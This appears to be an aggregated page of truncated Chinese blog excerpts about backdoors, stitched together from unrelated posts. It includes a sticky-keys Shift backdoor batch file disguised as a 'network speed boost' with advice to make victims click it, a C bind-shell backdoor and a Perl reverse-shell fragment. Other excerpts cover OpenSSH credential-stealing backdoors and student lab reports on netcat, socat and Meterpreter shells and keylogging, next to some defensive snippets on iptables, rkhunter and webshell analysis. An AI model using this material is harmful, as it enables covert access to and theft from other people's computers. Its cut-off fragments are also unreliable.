详细参考帖子及评论区:流氓进程AlibabaProtect的删除[程序员吧]_百度贴吧 首先打开服务找到AlibabaProtect,然后找到他的位置(C:\Program Files (x86)\AlibabaProtect,这个目录下有个uninstall的可执行文件,但是双击无反应,应该是一个带参数的命令行程序,如果能确定它的卸载参数,那就能轻松无残留搞定了,当然我没去找....), 把AlibabaProtect目录设置权限和拥有者, 再用火绒强制删除AlibabaProtect的下一级…
1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的). 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\system32\setchx.exe 3.Shift后门程序编写 将下面的内容保存成.bat后缀的文件,文件名你可以自己取,取的吸引人一点,他们就会点了,你懂的! 为了让别人不知道你这个程序在处理什么,你可以在里面写一些让他以为在做正常的东西的文字. 文件名:一键提升网速.bat echo 开始分析…
iptables的一些命令: a.    a) 使用规则实现外网不能访问本机,但是本机主动发起的连接正常进行. sudo iptables –A INPUT -p tcp —tcp —syn -j DROP a.    b) 使用规则限制对icmp echo request的回复为一分钟5次,从而降低攻击风险. sudo iptables -A INPUT -p icmp —icmp-type echo-request –m limit —limit-burst 5 -j ACCEPT sudo…
该程序实质是一个简单的socket编程,在受害方上运行攻击代码(后门进程),通过socket打开一个预设端口,并监听,等待攻击方的链接.一旦攻击方通过网络链接工具试图链接该socket,那么后门进程立刻fork一个子进程来处理链接请求.处理请求的行为即用exec函数打开一个shell来代替本子进程,并将本进程的标准输入.输出.出错文件描述符重定向到该套接字上,这样就实现了攻击方远程得到了受害方的一个shell. int main(int argc, char **argv) { int i, l…
具体怎么编译,生成执行程序,不懂得先学习C++程序代码编译和集成开发环境. 多的不说了,只有两个代码文件,一个头文件,一个源文件.不多说了,直接上干货. (恶意使用,或者商用,后果自负,与本人无关.) head.h #pragma once #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. #define WINVER 0x0600 // Change this to the appr…
#!/usr/bin/env perl use warnings; use strict; use Socket; my $HOST='localhost'; ; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($PORT, inet_aton($HOST)))){ open(STDIN,">&S"); open(STDOUT,">…
Rootkit是指其主要功能为隐藏其他程式进程的软件,可能是一个或一个以上的软件组合:广义而言,Rootkit也可视为一项技术.   目录 1 rootkit是什么 2 rootkit的功能 rootkitrootkit是什么 编辑 Rootkit是什么?估计很多朋友并不明白,简单的说,Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件.进程和网络链接等信息,比较多见到的是Rootkit一般都和木马.后门等其他恶意程序结合使用.Rootkit通过加载特殊的驱动,修改系…
后门程序 from gevent.backdoor import BackdoorServer server = BackdoorServer((), banner="Hello from gevent backdoor!", locals={'foo': "From defined scope!"}) server.serve_forever() 使用telnet链接后门,可以使用里面的python编译器查看程序运行情况 $ telnet Trying 127.0…
引言:相对于Windows,Linux操作系统的密码较难获取.不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的.  很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之一.OpenSSH后门比较难检测,本文选自<黑客攻防:实战加密与解密>将与您一起探讨如何添加及防范OpenS…
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
后门的基本概念及基础问题 后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径. [1] 后门程序,跟我们通常所说的"木马"有联系也有区别.联系在于:都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制.区别在于:木马是一个完整的软件,而后门则体积较小且功能都很单一.后门程序类似于特洛依木马(简称"木马"),其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作. 后门程序和电脑病毒最大的差别,在于后门程序…
2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF:meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF:meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试…
一.基础问题回答: (1)例举你能想到的一个后门进入到你系统中的可能方式? 钓鱼网站:搞一个假网站,假淘宝,盗版电影,文库下载文档什么的,下载东西的时候把带隐藏的后门程序附带下载进去,自启动,反弹连接. 搞一个小网站,用iframe标签跳转到危险网页,自动下载程序. (2)例举你知道的后门如何启动起来(win及linux)的方式? 修改注册表,开机的时候自启动 利用操作系统漏洞,修改系统文件,利用系统自启动进行启动 (3)Meterpreter有哪些给你映像深刻的功能? 1.getuid指令 可…
20165306 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载的软件有后…
NetSec2019 20165327 Exp2 后门原理与实践 快速找到重点: (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)…
Exp2 后门原理与实践 目录 1. 实验原理 2. 实验内容 3. 问题回答 4. 心得体会 实验原理简介 后门:不经过正常流程而访问系统的通道 ncat:底层工具,进行基本的TCP UDP数据收发 在两台电脑之间建立链接并返回数据流 *** 常用参数选项说明*** nc -h查看 -4 使用IPV4 -6 使用IPV6 -c, --sh-exec <command> 接收到的命令通过command(例如/bin/bash)执行 -e, --exec <command> 和-c差…
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了. (2)例举你知道的后门如何启动起来(win及linux)的方式? win:任务计划启动 linux:通过cron启动 (3)Meterpreter有哪些给你映像深刻的功能? 无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易. (4)如…
一.后门的概念       后门是指那些绕过安全性控制而获取对系统访问权的程序 二.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 非官方网站下载应用程序时,该应用程序可能绑定了一些可执行文件,因此留下后门.或者当我们打开一个网页时,如果该网页会自动链接到木马程序的话,就会在后台自动下载安装木马的安装程序, 并会自动安装木马,生成可执行文件,以此在系统留下后门. (2)例举你知道的后门如何启动起来(win及linux)的方式? Windows:设置为开机自启动.修改注册表项…
2018-2019-2 20165312<网络攻防技术>Exp2 后门原理与实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证.隐通道 后门执行的过程:后门程序(.exe)->投送到系统中->启动->隐藏 2.NC或netcat 进行基本的TCP.UDP数据收发 linux下自带ncat,man ncat可以查看用法 windows下需要下载ncat,且执行操作时需要在ncat路径下 windows(攻击者)获取linux…
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任…
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或netcat获取远程主机的Shell 1.1 Windows获得Linux Shell 1.2 Linux获得Win Shell 1.3 Mac获取Win shell 1.4 Win获取Mac Shell 1.5 Mac获取Linux Shell 1.6 Linux获取Mac Shell 1.7 Netcat扩展知…
2018-2019-2 网络对抗技术 20165324 Exp2: 后门原理与实践 课程学习: 后门 后门:是不经过正常认证流程而访问系统的通道,存在与编译器.操作系统.固件和应用中等等. 后门工作流程:程序→植入→运行→免杀. 后门工具:NC(netcat) 是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. NC命令 端口扫描 chat Server 文件传输 目录传输 加密数据 流视频 打开shell 反向shell 课下实验 实验准备: 获取IP地…
2018-2019-2 20165219<网络对抗技术>Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用Socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 常用后门工具 Netcat参考资料 Socat参考资料 基础问题 例…
一.实验准备 1.在实验前关闭或退出了防火墙.360杀毒软件.电脑卫士等所有的电脑保护软件,避免在实验过程中攻击时被拒绝.       2.使用Windows获linux shell (1)在Windows下使用ipconfig查看本机IP,地址为192.168.1.232 Linux使用ifconfig查看IP地址,地址为192.168.137.128. (2) 使用ncat.exe程序打开监听ncat.exe -l -p 4324 在kali中反弹连接Windows,nc 192.168.1…
    其实还是建议看英文的man,对以后学习其他东西很有帮助的:) 摘要 nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息.nmap支持很多扫描技术,例如:UDP.TCP connect().TCP SYN(半开扫描).ftp代理(bounce攻击).反向标志.ICMP.FIN.ACK扫描.圣诞树(Xmas Tree).SYN扫描和null扫描.从扫描类型一节可以得到细节.nmap还提供了一些高级的特征,例如:通过…
引言:相对于Windows,Linux操作系统的password较难获取.只是非常多Linuxserver配置了OpenSSH服务.在获取root权限的情况下,能够通过改动或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和password,甚至能够留下一个隐形的后门,达到长期控制Linuxserver的目的. 非常多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之中的一个.OpenSSH后门比較难检測,本文选自<黑客攻防:实战加密与解…
Exp2 后门原理与实践 前期准备 一.实验目标与基础知识 1.1 实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell,任务计划启动 使用MSF  meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹…
1.后门概念 后门就是不经过正常认证流程而访问系统的通道. 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序. -- 下面是近些年的一些例子: 编译器:苹果Xcode后门事件.苹果Xcode后门事件中招的APP包括:微信.网易云音乐.滴滴出行.12306等76个软件,影响到几亿用户. 操作系统:政府VS厂商.苹果公开拒绝FBI要求设置后门的要求.那些没拒绝的当然不会说话. 操作系统:深入解读MS14-068漏洞…
---恢复内容开始--- rkhunter简介: 中文名叫"Rootkit猎手", rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检测各种已知的rootkit特征码以外,还支持端口扫描.常用程序文件的变动情况检查. rkhunter的官方网站位于http://www.rootkit.nl/,目前最新的版本是rkhunter-1.4.2. rootkit是什么? rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文…
洒家的朋友的公司的某个站发现最近被上传了一个后门程序.为了取证我们抓取了HTTP请求流量,看到了一堆莫名其妙看似经过混淆的请求,响应也是看似base64的乱码.洒家用了2个小时静态分析了一遍,并写了利用脚本.后门程序看似是乱码,实际上经过了混淆,通过eval()可以执行任意PHP命令.由于混淆得很乱,做起来实在把洒家恶心了一番. 后门源代码: <?php /** * Signature For Report */$h='_)m/","/-/)m"),)marray()m…